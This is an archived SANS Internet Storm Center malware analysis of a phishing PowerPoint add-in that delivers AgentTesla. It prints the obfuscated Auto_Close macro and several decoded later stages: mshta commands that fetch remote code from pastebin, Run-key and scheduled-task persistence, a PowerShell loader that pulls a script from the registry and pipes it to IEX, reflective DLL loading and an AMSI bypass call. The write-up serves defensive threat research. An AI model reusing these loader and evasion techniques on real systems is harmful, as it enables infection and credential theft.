{
	"id": "a037d468-6861-47c5-9db3-a8886fbe04cf",
	"created_at": "2026-04-06T00:13:33.670643Z",
	"updated_at": "2026-04-10T03:20:23.598816Z",
	"deleted_at": null,
	"sha1_hash": "77ced4fa7b4e0f253f40101876f60f09cb1b3fb2",
	"title": "AgentTesla Delivered via a Malicious PowerPoint Add-In",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 614199,
	"plain_text": "AgentTesla Delivered via a Malicious PowerPoint Add-In\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 23:18:17 UTC\r\nAttackers are always trying to find new ways to deliver malicious code to their victims. Microsoft Word and Excel are\r\ndocuments that can be easily weaponized by adding malicious VBA macros. Today, they are one of the most common\r\ntechniques to compromise a computer. Especially because Microsoft implemented automatically executed macros when\r\nthe document is opened. In Word, the macro must be named AutoOpen(). In Excel, the name must be Workbook_Open().\r\nHowever, PowerPoint does not support this kind of macro. Really? Not in the same way as Word and Excel do!\r\nWhile hunting, I found an interesting document disguised as a PowerPoint template (with the extension ‘.pot’) delivered\r\nwithin a classic phishing email. In reality, it was not a template but an add-in. PowerPoint supports ‘add-ins’ developed by\r\nthird parties to add new features[1]. And guess what? Add-ins are able to automatically execute macros. Here is the list of\r\navailable actions:\r\nSub Auto_Open() - Gets executed immediately after the presentation is opened.\r\nSub Auto_Close() - Gets executed prior to the presentation is closed.\r\nSub Auto_Print() - Gets executed prior to the presentation being printed.\r\nSub Auto_ShowBegin() - Gets executed when the show begins.\r\nSub Auto_ShowEnd() - Gets executed when the show ends.\r\nSub Auto_NextSlide(Index as Long) - Gets executed before the slideshow moves onto the next slide. The index\r\nrepresents the SlideIndex of the Slide about to be displayed.\r\nTwo macros are fired automatically within an add-in. Auto_Open() and Auto_Close(). Auto_Open() is fired when the add-in is loaded and Auto_Close() fired when the add-in is being unloaded. You can use them to do preprocessing, creating\r\nmenu items, setting up event handlers, etc, or performing cleanup upon exiting.\r\nThe document (SHA256:b345b73a72f866ac3bc2945467d2678ca4976dd4c51bd0f2cdb142a79f56210a[2]) that I found\r\ncontains an Auto_Close() macro defined that will open an URL when the victim closes PowerPoint. Let’s have a look at\r\nthe document. Macros are stored in the same way as Word or Excel, they are stored in an OLE2 file:\r\nroot@remnux:/malwarezoo# file Payments\\ detail.pot\r\nPayments detail.pot: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code pag\r\nroot@remnux:/malwarezoo# oledump.py Payments\\ detail.pot\r\n 1: 2784 '\\x05DocumentSummaryInformation'\r\n 2: 380 '\\x05SummaryInformation'\r\n 3: 445 'PROJECT'\r\n 4: 26 'PROJECTwm'\r\n 5: M 1921 'VBA/Module1'\r\n 6: 2454 'VBA/_VBA_PROJECT'\r\n 7: 1377 'VBA/__SRP_0'\r\n 8: 88 'VBA/__SRP_1'\r\n 9: 392 'VBA/__SRP_2'\r\n 10: 103 'VBA/__SRP_3'\r\n 11: 493 'VBA/dir'\r\nhttps://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/\r\nPage 1 of 5\n\nroot@remnux:/malwarezoo# oledump.py Payments\\ detail.pot -s 5 -v\r\nAttribute VB_Name = \"Module1\"\r\n Sub auto_close()\r\n Dim yoCgYQoJx As Object\r\n Dim r5ozCUcyJ As String\r\n Dim a4CItAIOl As String\r\n Dim PhS6Kx17B As String\r\n PhS6Kx17B = (\"W\" + \"S\" + \"c\" + \"ript.Shell\")\r\n Set yoCgYQoJx = CreateObject(PhS6Kx17B)\r\n r5ozCUcyJ = StrReverse(\"\"\"a'*'zaebba'*'a'*'d\\p'*'.j\\\\:ptth\"\"\"\"aths'*'\"\"\")\r\n a4CItAIOl = Replace(r5ozCUcyJ, \"'*'\", \"m\")\r\n yoCgYQoJx.Run a4CItAIOl\r\nEnd Sub\r\nWhen the victim opens the ‘Payments detail.pot’ file, PowerPoint is launched and the add-in silently installed. Seeing that\r\nno content is displayed (there is no slide to render), the user will close PowerPoint and the macro will be executed.\r\nYou can see the installed Add-ins in the PowerPoint options:\r\nThe macro simply launches an URL. In this case, Windows will try to open with the default browser. The malicious URL\r\nhttps://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/\r\nPage 2 of 5\n\nis:\r\nhxxp://j[.]mp/dmamabbeazma\r\nThis HTTP request returns a 301 to a pastie:\r\nhxxps://pastebin[.]com/raw/U78a8pxJ\r\nHere is the pastie content (some Javascript code):\r\n\u003cscript type=\"text/javascript\"\u003e\r\n\u003c!--\r\neval(unescape('%66%75%6e%63%74%69%6f%6e%20%72%65%37%31%66%63%33%31%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d\r\neval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%72%65%37%31%66%63%33%31%28%27') + '%39%70%62%71\r\n// --\u003e\r\n\u003c/script\u003e\r\nThe decode version shows more payloads being downloaded:\r\nfunction re71fc31(s) {\r\n var r = \"\";\r\n var tmp = s.split(\"8863930\");\r\n s = unescape(tmp[0]);\r\n k = unescape(tmp[1] + \"635258\");\r\n for( var i = 0; i \u003c s.length; i++) {\r\n r += String.fromCharCode((parseInt(k.charAt(i%k.length))^s.charCodeAt(i))+-2);\r\n }\r\n return r;\r\n} document.write(re71fc31('%39%70%62%71%63%71%76%24%6d%66%72%6c%7f%64%6c%60%3a%2c%2b%25%3c%3b%38%2a%20%30%3f\r\nAnd, the decoded payload:\r\n\u003cscript language=\"\u0026#86;\u0026#66;\u0026#83;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\"\u003e\r\nCreateObject(\"WScript.Shell\").Run \"\"\"mshta\"\"\"\"http:\\\\pastebin.com\\raw\\3rM9m42v\"\"\"\r\nCreateObject(\"WScript.Shell\").Run StrReverse(\"/ 08 om/ ETUNIM cs/ etaerc/ sksathcs\") + \"tn \"\"Xvideos\"\" /tr \"\r\nCreateObject(\"WScript.Shell\").RegWrite StrReverse(\"TRATS\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS\\UCKH\"\r\nCreateObject(\"WScript.Shell\").RegWrite StrReverse(\"\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS\\UCKH\"), \"\"\r\nself.close\r\n\u003c/script\u003e\r\nThe script fetches two extra payloads from pastebin.com, one of them was already removed but I successfully grabbed a\r\ncopy. Both are identical, here is the decoded payload:\r\n\u003cscript language=\"\u0026#86;\u0026#66;\u0026#83;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\"\u003e\r\nCreateObject(\"WScript.Shell\").RegWrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\bin\", \"mshta vbsc\r\nhttps://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/\r\nPage 3 of 5\n\nCreateObject(\"Wscript.Shell\").regwrite \"HKCU\\Software\\iamresearcher\", \"$fucksecurityresearchers='contactmeEX\r\nConst HIDDEN_WINDOW = 0\r\nstrComputer = \".\"\r\nSet objWMIService = GetObject(\"winmgmts:\" \u0026 \"{impersonationLevel=impersonate}!\\\\\" \u0026 strComputer \u0026 \"\\root\\cim\r\nSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\r\nSet objConfig = objStartup.SpawnInstance_\r\nobjConfig.ShowWindow = HIDDEN_WINDOW\r\nSet objProcess = GetObject(\"winmgmts:root\\cimv2:Win32_Process\")\r\nerrReturn = objProcess.Create( \"powershell ((gp HKCU:\\Software).iamresearcher)|IEX\", null, objConfig, intPro\r\n'i am not a coder not a expert i am script kiddie expert i read code from samples on site then compile in my\r\n'i am not a coder ;) i watch you on twitter every day thanks :) i love my code reports!\r\n'i am not a coder! bang ;)\r\nself.close\r\n\u003c/script\u003e\r\n(Note the funny comments at the end of the script)\r\nTwo new pasties are fetched. Here is the decoded content (PowerShell code):\r\nfunction UNpaC0k3333300001147555 {\r\n [CmdletBinding()]\r\n Param ([byte[]] $byteArray)\r\n Process {\r\n Write-Verbose \"Get-DecompressedByteArray\"\r\n $input = New-Object System.IO.MemoryStream( , $byteArray )\r\n $output = New-Object System.IO.MemoryStream\r\n $01774000 = New-Object System.IO.Compression.GzipStream $input,\r\n ([IO.Compression.CompressionMode]::Decompress)\r\n $puffpass = New-Object byte[](1024)\r\n while($true) {\r\n $read = $01774000.Read($puffpass, 0, 1024)\r\n if ($read -le 0){break}\r\n $output.Write($puffpass, 0, $read)\r\n }\r\n [byte[]] $bout333 = $output.ToArray()\r\n Write-Output $bout333\r\n }\r\n}\r\n$t0='DEX'.replace('D','I');sal g $t0;[Byte[]]$MNB=('@!1F,@!8B,@!08,@!00,@!00,@!00,@!00,@!00,@!04,@!00,@!ED,@\r\n[stuff removed]\r\n7F,@!33,@!D0,@!4A,@!F9,@!3E,@!89,@!0D,@!DF,@!D6,@!F3,@!4D,@!3E,@!3D,@!8C,@!3C,@!08,@!46,@!20,@!B6,@!2B,@!82,\r\n[Byte[]]$blindB=('@!1F,@!8B,@!08,@!00,@!00,@!00,@!00,@!00,@!04,@!00,@!CC,@!BD,@!07,@!78,@!14,@!55,@!DB,@!3F,\r\n[stuff removed]\r\nhttps://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/\r\nPage 4 of 5\n\nF2,@!D3,@!57,@!FF,@!E7,@!66,@!03,@!86,@!AC,@!3C,@!96,@!D0,@!16,@!EC,@!FD,@!F1,@!99,@!5B,@!54,@!79,@!24,@!D3,\r\n[byte[]]$deblindB = UNpaC0k3333300001147555 $blindB\r\n$blind=[System.Reflection.Assembly]::Load($deblindB)\r\n[Amsi]::Bypass()\r\n[byte[]]$decompressedByteArray = UNpaC0k3333300001147555 $MNB\r\nThe two hex-encoded chunks of data decoded into a DLL and a PE. The PE is an AgentTesla malware\r\n(SHA256: d46615754e00e004d683ff2ad5de9bca976db9d110b43e0ab0f5ae35c652fab7[3])\r\nConclusion: PowerPoint can also be used to deliver malicious content!\r\n[1] https://docs.microsoft.com/en-us/office/dev/add-ins/tutorials/powerpoint-tutorial\r\n[2] https://www.virustotal.com/gui/file/b345b73a72f866ac3bc2945467d2678ca4976dd4c51bd0f2cdb142a79f56210a/detection\r\n[3] https://www.virustotal.com/gui/file/d46615754e00e004d683ff2ad5de9bca976db9d110b43e0ab0f5ae35c652fab7/detection\r\nXavier Mertens (@xme)\r\nSenior ISC Handler - Freelance Cyber Security Consultant\r\nPGP Key\r\nSource: https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/\r\nhttps://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/"
	],
	"report_names": [
		"26162"
	],
	"threat_actors": [],
	"ts_created_at": 1775434413,
	"ts_updated_at": 1775791223,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/77ced4fa7b4e0f253f40101876f60f09cb1b3fb2.pdf",
		"text": "https://archive.orkl.eu/77ced4fa7b4e0f253f40101876f60f09cb1b3fb2.txt",
		"img": "https://archive.orkl.eu/77ced4fa7b4e0f253f40101876f60f09cb1b3fb2.jpg"
	}
}